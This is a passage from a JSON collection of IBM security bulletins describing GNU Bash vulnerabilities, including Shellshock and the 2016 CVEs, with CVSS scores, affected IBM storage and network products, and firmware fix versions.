"impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2018-06-18T01:37:30", "id": "4731BA355DE24384D3CFF513F9FAE2FEE084386CECD71260FBE174244F974C06", "href": "https://www.ibm.com/support/pages/node/631789", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-01T21:54:43", "description": "## Summary\n\nIBM QRadar Network Security has addressed vulnerabilities in bash.\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2016-9401](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9401>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to bypass security restrictions, caused by a use-after-free error. An attacker could exploit this vulnerability using a specially crafted address to bypass the restricted shell. \nCVSS Base Score: 4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/122314> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n\n**CVEID:** [CVE-2016-7543](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7543>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary commands on the system. An attacker could exploit this vulnerability using specially crafted SHELLOPTS and PS4 variables to execute arbitrary commands on the system with root privileges. \nCVSS Base Score: 8.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/121372> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n**CVEID:** [CVE-2016-0634](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/121373> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM QRadar Network Security 5.4\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_| _Remediation/First Fix_ \n---|---|--- \nIBM QRadar Network Security| Firmware version 5.4| Install Firmware 5.4.0.2 from the Available Updates page of the Local Management Interface, or by performing a One Time Scheduled Installation from SiteProtector. \nOr \nDownload Firmware 5.4.0.2 from [IBM Security License Key and Download Center](<https://ibmss.flexnetoperations.com/control/isdl/home>) and upload and install via the Available Updates page of the Local Management Interface. \n \n## Workarounds and Mitigations\n\nNone\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Change History\n\n31 August 2017: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n[{\"Product\":{\"code\":\"SSFSVP\",\"label\":\"IBM QRadar Network Security\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"PF009\",\"label\":\"Firmware\"}],\"Version\":\"5.4\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB24\",\"label\":\"Security Software\"}}]", "cvss3": {"exploitabilityScore": 2.5, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.4, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-16T22:02:07", "type": "ibm", "title": "Security Bulletin: IBM QRadar Network Security is affected by vulnerabilities in bash (CVE-2016-9401, CVE-2016-7543, CVE-2016-0634)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0634", "CVE-2016-7543", "CVE-2016-9401"], "modified": "2018-06-16T22:02:07", "id": "E1446A837AA754AA9D0FE98370ECB6988935685C35B2360E6374E7415609B6F7", "href": "https://www.ibm.com/support/pages/node/567121", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-04T12:39:35", "description": "## Summary\n\nA vulnerability in Bash affects IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM Spectrum Virtualize Software, IBM Spectrum Virtualize for Public Cloud and IBM FlashSystem V9000 products. OpenSSH is used in the Command Line Interface.\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2016-0634_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0634>)** \nDESCRIPTION:** GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an error related to the expansion of the $HOSTNAME. By injecting the hostname with malicious code, an attacker could exploit this vulnerability to execute arbitrary code on the system. \nCVSS Base Score: 4.9 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/121373_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/121373>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM SAN Volume Controller \nIBM Storwize V7000 \nIBM Storwize V5000 \nIBM Storwize V3700 \nIBM Storwize V3500 \nIBM FlashSystem V9000 \nIBM Spectrum Virtualize Software \nIBM Spectrum Virtualize for Public Cloud \n \nAll products are affected when running supported versions 7.5 to 8.1.\n\n## Remediation/Fixes\n\nIBM recommends that you fix this vulnerability by upgrading affected versions of IBM SAN Volume Controller, IBM Storwize V7000, V5000, V3700 and V3500, IBM FlashSystem V9000, IBM Spectrum Virtualize Software, and IBM Spectrum Virtualize for Public Cloud to the following code levels or higher: \n \n7.7.1.9 \n7.8.1.6 \n8.1.1.2 \n8.1.2.1 \n \n[_Latest IBM SAN Volume Controller Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Storage%20virtualization&product=ibm/StorageSoftware/SAN+Volume+Controller+\$2145\$&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V7000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V7000+\$2076\$&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V5000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Mid-range%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V5000&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3700 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3700&release=All&platform=All&function=all>) \n[_Latest IBM Storwize V3500 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Entry-level%20disk%20systems&product=ibm/Storage_Disk/IBM+Storwize+V3500&release=All&platform=All&function=all>) \n[_Latest IBM FlashSystem V9000 Code_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Flash%20high%20availability%20systems&product=ibm/StorageSoftware/IBM+FlashSystem+V9000&release=All&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize Software_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+software&release=8.1&platform=All&function=all>) \n[_Latest IBM Spectrum Virtualize for Public Cloud_](<https://www-945.ibm.com/support/fixcentral/swg/selectFixes?parent=Software%20defined%20storage&product=ibm/StorageSoftware/IBM+Spectrum+Virtualize+for+Public+Cloud&release=8.1&platform=All&function=all>) \n \nFor unsupported versions of the above products, IBM recommends upgrading to a fixed, supported version of code.\n\n## Workarounds and Mitigations\n\nAlthough IBM recommends that you install a level of code with a fix for this vulnerability, you can mitigate, although not eliminate, your risk until you have done so by ensuring that all users who have access to the system are authenticated by another security system such as a firewall.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\n[Complete CVSS v3 Guide](<http://www.first.org/cvss/user-guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v3](<http://www.first.org/cvss/calculator/3.0> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n[_Subscribe to Security Bulletins_](<http://www.ibm.com/support/mynotifications/>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n11 May 2018: Original version published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"ST3FR7\",\"label\":\"IBM Storwize V7000 (2076)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"6.1\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"6.1;6.2;6.3;6.4;7.1;7.2;7.3;7.4;7.5;7.6;7.6.1;7.7;7.7.1;7.8;7.8.1;8.1;8.1.1;8.1.2\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STLM6B\",\"label\":\"IBM Storwize V3500 (2071)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"},{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent;Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STLM5A\",\"label\":\"IBM Storwize V3700 (2072)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STHGUJ\",\"label\":\"IBM Storwize V5000 and V5100\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STPVGU\",\"label\":\"SAN Volume Controller\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STKMQV\",\"label\":\"IBM FlashSystem V9000\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"SS4S7L\",\"label\":\"IBM Spectrum Virtualize Software\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STHLEK\",\"label\":\"IBM Spectrum Virtualize for Public Cloud\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}}]", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-25T02:50:32", "type": "ibm", "title": "Security Bulletin: Vulnerability in Bash affects IBM SAN Volume Controller, IBM Storwize, IBM Spectrum Virtualize and IBM FlashSystem products (CVE-2016-0634)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.0, "vectorString": "AV:N/AC:M/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0634"], "modified": "2022-05-25T02:50:32", "id": "304E11DFAAD56C940D8828C425CAC9120407818C35DBDD77A4B892CE5F73ED7B", "href": "https://www.ibm.com/support/pages/node/650903", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T12:46:52", "description": "## Summary\n\nSix Bash vulnerabilities were disclosed in September 2014. This bulletin addresses the vulnerabilities that have been referred to as \u201cBash Bug\u201d or \u201cShellshock\u201d and two memory corruption vulnerabilities. Bash is used by IBM SAN b-type Switches.\n\n## Vulnerability Details\n\n**CVE-ID**: [_CVE-2014-6271_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an error when evaluating specially-crafted environment variables passed to it by the bash functionality. An attacker could exploit this vulnerability to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96153_**](<http://xforce.iss.net/xforce/xfdb/96153>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7169_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7169>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary commands on the system, caused by an incomplete fix related to malformed function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to write to files and execute arbitrary commands on the system. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [**_http://xforce.iss.net/xforce/xfdb/96209_**](<http://xforce.iss.net/xforce/xfdb/96209>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n**CVE-ID**: [_CVE-2014-7186_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7186>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an out-of-bounds memory access while handling redir_stack. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96237_](<http://xforce.iss.net/xforce/xfdb/96237>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n**CVE-ID**: [_CVE-2014-7187_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7187>) \n \n**DESCRIPTION**: GNU Bash could allow a local attacker to execute arbitrary code on the system, caused by an off-by-one-error when handling deeply nested flow control constructs. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 4.6 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96238_](<http://xforce.iss.net/xforce/xfdb/96238>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:L/AC:L/Au:N/C:P/I:P/A:P) \n \n \n[_CVE-2014-6277_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6277>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the failure to properly parse function definitions in the values of environment variables. An attacker could exploit this vulnerability using attack vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96686_](<http://xforce.iss.net/xforce/xfdb/96686>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C) \n \n \n[_CVE-2014-6278_](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278>) \n \n**DESCRIPTION**: GNU Bash could allow a remote attacker to execute arbitrary code on the system, caused by an incomplete fix related to the parsing of user scripts. An attacker could exploit this vulnerability to execute arbitrary code on the system or cause a denial of service. \n \nCVSS Base Score: 10.0 \nCVSS Temporal Score: See [_http://xforce.iss.net/xforce/xfdb/96687_](<http://xforce.iss.net/xforce/xfdb/96687>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:C/I:C/A:C)\n\n## Affected Products and Versions\n\nIBM MTM: \n\n2499-816| IBM System Storage SAN768B-2 \n---|--- \n2499-416| IBM System Storage SAN384B-2 \n2499-384| IBM System Storage SAN768B \n2499-192| IBM System Storage SAN384B \n2498-R06| IBM System Storage SAN06B-R \n2498-N96| IBM System Networking SAN96B-5 \n2498-F96| IBM System Networking SAN96B-5 \n2498-F48| IBM System Storage SAN48B-5 \n2498-F24| IBM System Networking SAN24B-5 \n2498-E32| IBM Encryption Switch \n2498-B80| IBM System Storage SAN80B-4 \n2498-B40| IBM System Storage SAN40B-4 \n2498-B24| IBM System Storage SAN24B-4 \n2109-M48| IBM TotalStorage SAN256B Director Model M48 \n2005-R04| IBM System Storage SAN04B-R \n \n## Remediation/Fixes\n\nIBM recommends that you remediate the Bash vulnerability by updating to one of the following fixes: \n \n\n\nFOS 7.2.1c1 | <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.2.1c1> \n---|--- \nFOS 7.2.0d6| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.2.0d6> \nFOS 7.1.2b1| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.1.2b1> \nFOS 7.1.1c1 | <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.1.1c1> \nFOS 7.1.0cb| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.1.0cb> \nFOS 7.0.2e1| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.0.2e1> \nFOS 7.0.0d1| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_7.0.0d1> \nFOS 6.4.3f3 | <ftp://ftp.software.ibm.com/storage/san/b_type/fos_6.4.3f3> \nFOS 6.4.2a3| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_6.4.2a3> \nFOS 6.2.2f9| <ftp://ftp.software.ibm.com/storage/san/b_type/fos_6.2.2f9> \n \nIBM recommends that you review your entire environment to identify vulnerable releases of Bash including your Operating Systems and take appropriate mitigation and remediation actions. Please contact your Operating System provider for more information. \n\n## Workarounds and Mitigations\n\nNone known \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www-03.ibm.com/systems/z/advantages/security/integrity_sub.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## Get Notified about Future Security Bulletins\n\nSubscribe to [My Notifications](< http://www-01.ibm.com/software/support/einfo.html>) to be notified of important product support alerts like this.\n\n### References \n\n[Complete CVSS v2 Guide](<http://www.first.org/cvss/v2/guide> \"Link resides outside of ibm.com\" ) \n[On-line Calculator v2](<http://nvd.nist.gov/CVSS-v2-Calculator> \"Link resides outside of ibm.com\" )\n\nOff \n\n## Related Information\n\n[IBM Secure Engineering Web Portal](<http://www.ibm.com/security/secure-engineering/bulletins.html>) \n[IBM Product Security Incident Response Blog](<http://www.ibm.com/blogs/psirt>)\n\n## Acknowledgement\n\nNone\n\n## Change History\n\n10 October 2014: Original Version Published\n\n*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\n## Disclaimer\n\nAccording to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"\"AS IS\"\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. \"Affected Products and Versions\" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.\n\n[{\"Product\":{\"code\":\"STMSAD\",\"label\":\"Storage area network (SAN)->SAN768B-2 Fabric Backbone (2499-816)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\"--\",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMSBR\",\"label\":\"Storage area network (SAN)->SAN384B-2 Fabric Backbone (2499-416)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"All Versions\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STUQVR\",\"label\":\"Storage area network (SAN)->SAN32B-E4 (2498-E32)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STNNL8\",\"label\":\"Storage area network (SAN)->SAN24B-5 Switch (2498-F24)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMSCJ\",\"label\":\"Storage area network (SAN)->SAN48B-5 Switch (2498-F48)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STNNAB\",\"label\":\"Storage area network (SAN)->SAN96B-5 Switch (2498-F96, N96)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"N\\/A\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"SSH1AU9\",\"label\":\"IBM Converged Switch (3758-B32)\"},\"Business Unit\":{\"code\":\"BU058\",\"label\":\"IBM Infrastructure w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"PF025\",\"label\":\"Platform Independent\"}],\"Version\":\"Version Independent\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB26\",\"label\":\"Storage\"}},{\"Product\":{\"code\":\"STMKQC\",\"label\":\"SAN768B Fabric Backbone (2499-384)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" \",\"Platform\":[{\"code\":\"\",\"label\":\"\"}],\"Version\":\"\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"\",\"label\":\"\"}},{\"Product\":{\"code\":\"STMKPN\",\"label\":\"SAN384B Fabric Backbone (2499-192)\"},\"Business Unit\":{\"code\":\"BU054\",\"label\":\"Systems w\\/TPS\"},\"Component\":\" 